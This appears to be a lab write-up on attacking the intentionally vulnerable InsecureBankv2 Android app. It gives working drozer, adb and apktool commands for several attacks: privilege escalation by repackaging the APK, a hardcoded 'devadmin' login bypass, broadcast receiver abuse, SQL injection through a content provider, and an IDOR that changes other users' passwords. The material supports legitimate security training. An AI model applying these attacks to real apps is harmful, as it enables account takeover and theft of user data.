Hacking InsecureBankv2 App
Analyze traffic using burp
Install Apk in the android emulator
Fire up burp suite and configure the proxy to listen to all interfaces on port 8081
Configure proxy settings in the android emulator WIFI settings to be your localip:8081
Install Certificate to your emulator by exporting the burp certificate -> rename it to
burp.cer-> push it to the emulator viaadb push <PATH>then install it to your devicerun app.py for your server and proxifiy traffic using burp and use all feature and collect all requests
Pulling apk from devices
➜ ~ adb shell
vbox86p:/ # pm list packages | grep -i "insecurebank"
package:com.android.insecurebankv2
vbox86p:/ # pm path com.android.insecurebankv2
package:/data/app/com.android.insecurebankv2-PTvJEwmj-WzQHJux46vKZQ==/base.apk
vbox86p:/ # exit
➜ ~ cd Documents/Android\ AppSec/vulnApps/
➜ vulnApps adb pull /data/app/com.android.insecurebankv2-PTvJEwmj-WzQHJux46vKZQ==/base.apk
/data/app/com.android.insecurebankv2-P...d. 21.1 MB/s (3462429 bytes in 0.157s)
➜ vulnApps ls
6_3_SieveLoginBypass.zip sieve_patched_no_crypto
base.apk sieve_patched_no_crypto.apkDecompiling application
# conver base.apk to base.jar
./d2j-dex2jar.sh -f ~/path/to/apk_to_decompile.apk
# using jadx cli or jadx-gui you can get the similar ava source code
➜ ~ jadx base-dex2jar.jar
➜ ~ jadx-gui
INFO - output directory: base-dex2jar
INFO - loading ...
INFO - Loaded classes: 6529, methods: 40188, instructions: 1564986
INFO - Resetting disk code cache, base dir: /home/sallam/.cache/jadx/projects/base-dex2jar-4b505a6f3e3bda1e1de8b834d5846214/code
# Using apktool decompiling the apk
➜ vulnApps apktool d base.apk
I: Using Apktool 2.9.3 on base.apk
I: Loading resource table...
I: Decoding file-resources...
I: Loading resource table from file: /home/sallam/.local/share/apktool/framework/1.apk
I: Decoding values */* XMLs...
I: Decoding AndroidManifest.xml with resources...
I: Regular manifest package...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
➜ vulnApps ls
6_3_SieveLoginBypass.zip base.apk sieve_patched_no_crypto
base base-dex2jar.jar sieve_patched_no_crypto.apkAnalyze the code and android manifest.xml
subl base/AndroidManifest.xmlUse drozer to give you an overview about the application how to do it
run app.package.info -a com.android.insecurebankv2 run app.package.attacksurface com.android.insecurebannkv2
Previlige Escalation
Fire up JADX and open up the
base.apkfileNow you can see the source code and the apk data like the resources files
After searching for keywords like "admin" in the LoginActivity if ound this
this guy using a boolean value from resources to hide some functionalities
Go to
res/values/stings.xmland notice "is_admin" is equal to no
Now Using code editors like sublime change it to yes and save the project
Now Change the name of directory to
Use APKTOOL to build our updated version and use sign tool to sign the application
And that's it you just remove the old version from phone and install your updated version instead
the signed apk will be
insecurebankv2.s.apkNotice Now there is a functionality for registration added
Back to jadx in the DoLogin Activity i found this weird Code
The "devadmin" part in the postData method handles a specific case where the username is "devadmin." When the username is "devadmin," the method sends the login data to a different endpoint (/devlogin) rather than the standard login endpoint (/login). This could be used for developers or administrators who might need to authenticate through a different process or endpoint. Here’s a more detailed explanation focusing on this aspect:
Check Username:
The method checks if the username is "devadmin":
javaCopy codeif (DoLogin.this.username.equals("devadmin")) {
Send to
/devloginEndpoint:If the username is "devadmin", it sets the entity (the body of the HTTP request) for
httppost2(which points to the/devloginURL) with the prepared login data and executes this post request:javaCopy codehttppost2.setEntity(new UrlEncodedFormEntity(nameValuePairs)); responseBody = httpclient.execute(httppost2);
Send to
/loginEndpoint:If the username is not "devadmin", it sets the entity for
httppost(which points to the standard/loginURL) with the login data and executes this post request:javaCopy codehttppost.setEntity(new UrlEncodedFormEntity(nameValuePairs)); responseBody = httpclient.execute(httppost);
So Login with username "devadmin" and without password will authenticate you as devadmin
Analyze SqlLite Storage
It is as easy as just go to the database directory of the package in the data directory
Then initialize sqlite and interact with it read tables and that stuff
1|vbox86p:/data/data/com.android.insecurebankv2/databases # ls
mydb mydb-journal
vbox86p:/data/data/com.android.insecurebankv2/databases # sqlite3 mydb
SQLite version 3.22.0 2018-12-19 01:30:22
Enter ".help" for usage hints.
sqlite> .tables
android_metadata names
sqlite> select * from android_metadata;
en_US
sqlite> select * from names;
1|dinesh
2|dinesh
sqlite>
Insecure Logging
Android Logs Accessible by all applications so when app expose secrets or private information it is a bug !
I Entered command
adb logcatAnd tried to Login to Apllication and Voila!!
The app Exposes plaint-text of the users
Exploit Broadcast Receivers
Information Gathering
# Using drozer get the broadcast receivers informations
dz> run app.broadcast.info -a com.android.insecurebankv2
Attempting to run shell module
Package: com.android.insecurebankv2
com.android.insecurebankv2.MyBroadCastReceiver
Permission: nullStatic Analysis
MyBroadCastActivity
package com.android.insecurebankv2;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.content.SharedPreferences;
import android.telephony.SmsManager;
import android.util.Base64;
/* JADX WARN: Classes with same name are omitted:
/home/sallam/Documents/Android AppSec/vulnApps/InsecureBankv2/build/apk/classes.dex
*/
/* loaded from: /tmp/jadx-4403557323843835393.dex */
public class MyBroadCastReceiver extends BroadcastReceiver {
public static final String MYPREFS = "mySharedPreferences";
String usernameBase64ByteString;
@Override // android.content.BroadcastReceiver
public void onReceive(Context context, Intent intent) {
String phn = intent.getStringExtra("phonenumber");
String newpass = intent.getStringExtra("newpass");
if (phn != null) {
try {
SharedPreferences settings = context.getSharedPreferences("mySharedPreferences", 1);
String username = settings.getString("EncryptedUsername", null);
byte[] usernameBase64Byte = Base64.decode(username, 0);
this.usernameBase64ByteString = new String(usernameBase64Byte, "UTF-8");
String password = settings.getString("superSecurePassword", null);
CryptoClass crypt = new CryptoClass();
String decryptedPassword = crypt.aesDeccryptedString(password);
String textPhoneno = phn.toString();
String textMessage = "Updated Password from: " + decryptedPassword + " to: " + newpass;
SmsManager smsManager = SmsManager.getDefault();
System.out.println("For the changepassword - phonenumber: " + textPhoneno + " password is: " + textMessage);
smsManager.sendTextMessage(textPhoneno, null, textMessage, null, null);
return;
} catch (Exception e) {
e.printStackTrace();
return;
}
}
System.out.println("Phone number is null");
}
}This code defines a BroadcastReceiver that listens for specific intents containing a phone number and a new password. When triggered, it retrieves encrypted username and password from shared preferences, decrypts the password, and sends an SMS to the given phone number with a message about the password update. If the phone number is not provided, it logs that the phone number is null.
Exploit send message tophone number 8888888 with new password
dz> run app.broadcast.send --action thBroadcast --extra string phonenummber 8888888 --extra string newpass Lol@88
Exploit Content Providers
Find Provider URIs
dz> run app.provider.finduri com.android.insecurebankv2
Attempting to run shell module
Scanning com.android.insecurebankv2...
content://com.android.insecurebankv2.TrackUserContentProvider
content://com.google.android.gms.games
content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers/
content://com.android.insecurebankv2.TrackUserContentProvider/
content://com.google.android.gms.games/
content://com.android.insecurebankv2.TrackUserContentProvider/trackerusersScan for Injection
dz> run scanner.provider.injection -a com.android.insecurebankv2
Attempting to run shell module
Scanning com.android.insecurebankv2...
Not Vulnerable:
content://com.google.android.gms.games
content://com.android.insecurebankv2.TrackUserContentProvider
content://com.android.insecurebankv2.TrackUserContentProvider/
content://com.google.android.gms.games/
Injection in Projection:
content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers
content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers/
Injection in Selection:
content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers
content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers/
Exploit SQL Injection
dz> run app.provider.query content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers/ --projection ""
Attempting to run shell module
Exception occured: near "FROM": syntax error (code 1 SQLITE_ERROR): , while compiling: SELECT FROM names ORDER BY name
dz> run app.provider.query content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers/ --projection "* from sqlite_master; --"
Attempting to run shell module
| type | name | tbl_name | rootpage | sql |
| table | android_metadata | android_metadata | 3 | CREATE TABLE android_metadata (locale TEXT) |
| table | names | names | 4 | CREATE TABLE names (id INTEGER PRIMARY KEY AUTOINCREMENT, name TEXT NOT NULL) |
| table | sqlite_sequence | sqlite_sequence | 5 | CREATE TABLE sqlite_sequence(name,seq) |The Reason
public Cursor query(Uri uri, String[] projection, String selection, String[] selectionArgs, String sortOrder) {
SQLiteQueryBuilder qb = new SQLiteQueryBuilder();
qb.setTables(TABLE_NAME);
switch (uriMatcher.match(uri)) {
case 1:
qb.setProjectionMap(values);
if (sortOrder == null || sortOrder == "") {
sortOrder = name;
}
Cursor c = qb.query(this.db, projection, selection, selectionArgs, null, null, sortOrder);
c.setNotificationUri(getContext().getContentResolver(), uri);
return c;
default:
throw new IllegalArgumentException("Unknown URI " + uri);
}
}Using SQLiteQueryBuilder without proper input validation can lead to SQL injection in content providers. If selection, selectionArgs, or sortOrder are directly used from untrusted sources (like user input) without sanitization, attackers can manipulate these parameters to execute arbitrary SQL commands, compromising the database.
Weak Cryptography
In shared preferences, logged-in user credentials are stored in an encrypted manner.
You can decrypt it using online AES dycryption tools like https://www.devglan.com/online-tools/aes-encryption-decryption#google_vignette
IDOR to ATO
While Proxifying the trafiic with burp suite i Looked up some functions like change-password feature
I noticed the part that contains username but i cant edit the username on it
After sending acorrect request and the password successufully changed
In burp the request was sple api request with parameters username and newpassword
So I Edited the username parameter to another username and it worked i changed other user's password
Last updated
Was this helpful?